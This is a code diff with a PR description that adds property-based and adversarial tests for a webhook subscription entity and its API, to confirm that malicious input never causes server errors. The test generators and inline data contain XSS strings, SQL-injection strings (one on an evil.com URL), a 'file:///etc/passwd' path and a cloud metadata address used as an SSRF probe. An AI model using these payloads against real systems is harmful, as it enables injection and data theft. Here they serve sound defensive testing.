+            Guid.NewGuid(), Guid.NewGuid(), "https://example.com/webhook", "secret123");
+        sub.Revoke(Guid.NewGuid());
+
+        var act = () => sub.RotateSecret("newSecret");
+        act.Should().Throw<DomainException>()
+            .Where(e => e.ErrorCode == ErrorCodes.InvalidOperation);
+    }
+
+    // ─────────────────────── URL injection stored verbatim ───────────────────────
+
+    [Theory]
+    [InlineData("javascript:alert(1)")]
+    [InlineData("data:text/html,<h1>hi</h1>")]
+    [InlineData("https://evil.com/'; DROP TABLE --")]
+    public void DangerousUrl_StoredVerbatim(string url)
+    {
+        // The domain layer stores URLs as-is; validation of schemes happens at the API layer
+        var sub = new OutboundWebhookSubscription(
+            Guid.NewGuid(), Guid.NewGuid(), url, "secret123");
+        sub.EndpointUrl.Should().Be(url, "URLs should be stored verbatim at the domain level");
+    }
+}

--- a/backend/tests/Taskdeck.Domain.Tests/PropertyBased/WebhookSubscriptionPropertyTests.cs
+++ b/backend/tests/Taskdeck.Domain.Tests/PropertyBased/WebhookSubscriptionPropertyTests.cs
@@ -19,22 +19,6 @@ public class WebhookSubscriptionPropertyTests
 
     // ─────────────────────── Generators ───────────────────────
 
-    private static Gen<string> AdversarialStringGen() => Gen.OneOf(
-        Gen.Constant("\u0000"),
-        Gen.Constant("\uFEFF"),
-        Gen.Constant("\u200B"),
-        Gen.Constant("<script>alert('xss')</script>"),
-        Gen.Constant("javascript:alert(1)"),
-        Gen.Constant("data:text/html,<script>alert(1)</script>"),
-        Gen.Constant("file:///etc/passwd"),
-        Gen.Constant("http://169.254.169.254/"),
-        Gen.Constant("'; DROP TABLE webhooks; --"),
-        Gen.Constant(""),
-        Gen.Constant(" "),
-        Gen.Constant((string)null!),
-        ArbMap.Default.ArbFor<string>().Generator.Where(s => s != null)
-    );
-
     private static Gen<string> ValidUrlGen() =>
         Gen.Elements(
             "https://example.com/webhook",
@@ -132,7 +116,7 @@ public class WebhookSubscriptionPropertyTests
     public Property Constructor_NeverThrowsUnhandled_OnAdversarialUrl()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
             url =>
             {
                 try
@@ -158,7 +142,7 @@ public class WebhookSubscriptionPropertyTests
     public Property Constructor_NeverThrowsUnhandled_OnAdversarialSecret()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
             secret =>
             {
                 try
@@ -185,7 +169,7 @@ public class WebhookSubscriptionPropertyTests
     public Property EventFilters_WithAdversarialStrings_NeverThrowUnhandled()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
             filter =>
             {
                 try
@@ -231,7 +215,7 @@ public class WebhookSubscriptionPropertyTests
     public Property MatchesEvent_NeverThrowsUnhandled_OnAdversarialEventType()
     {
         return Prop.ForAll(
-            Arb.From(AdversarialStringGen()),
+            Arb.From(TestGenerators.AdversarialStringGen()),
             eventType =>
             {
                 var sub = new OutboundWebhookSubscription(
@@ -298,7 +282,7 @@ public class WebhookSubscriptionPropertyTests
     [InlineData("https://evil.com/'; DROP TABLE --")]
     public void DangerousUrl_StoredVerbatim(string url)
     {
-        // The domain layer stores URLs as-is; validation of schemes happens at the API layer
+        // The domain layer stores URLs after Trim(); no scheme validation at this layer
         var sub = new OutboundWebhookSubscription(
             Guid.NewGuid(), Guid.NewGuid(), url, "secret123");
         sub.EndpointUrl.Should().Be(url, "URLs should be stored verbatim at the domain level");


### PR DESCRIPTION
## Summary
- Adds FsCheck property-based tests for 5 domain entities (ChatSession, ChatMessage, Notification, KnowledgeDocument, OutboundWebhookSubscription) that previously lacked property-based coverage
- Adds JSON serialization round-trip fuzz tests for Chat and Notification DTOs with adversarial content
- Adds raw JSON adversarial API tests covering: float/overflow card positions, card description XSS/injection, duplicate board names (including unicode), extra unknown fields (__proto__/constructor), and chat endpoint adversarial inputs
- All tests verify the "no 500s" contract: random/malicious input never produces server errors

**New test count:** 162 new tests across 8 test files (93 domain property tests, 19 DTO serialization tests, 50 API adversarial tests)

Closes #717

## Test plan
- [x] All 93 new domain property-based tests pass
- [x] All 19 new DTO serialization round-trip tests pass
- [x] All 50 new API adversarial tests pass (no 500 responses)
- [x] Full backend test suite passes (1717 tests, 0 failures)
- [x] Full frontend test suite passes (2245 tests, 0 failures)
- [x] Existing test suites unaffected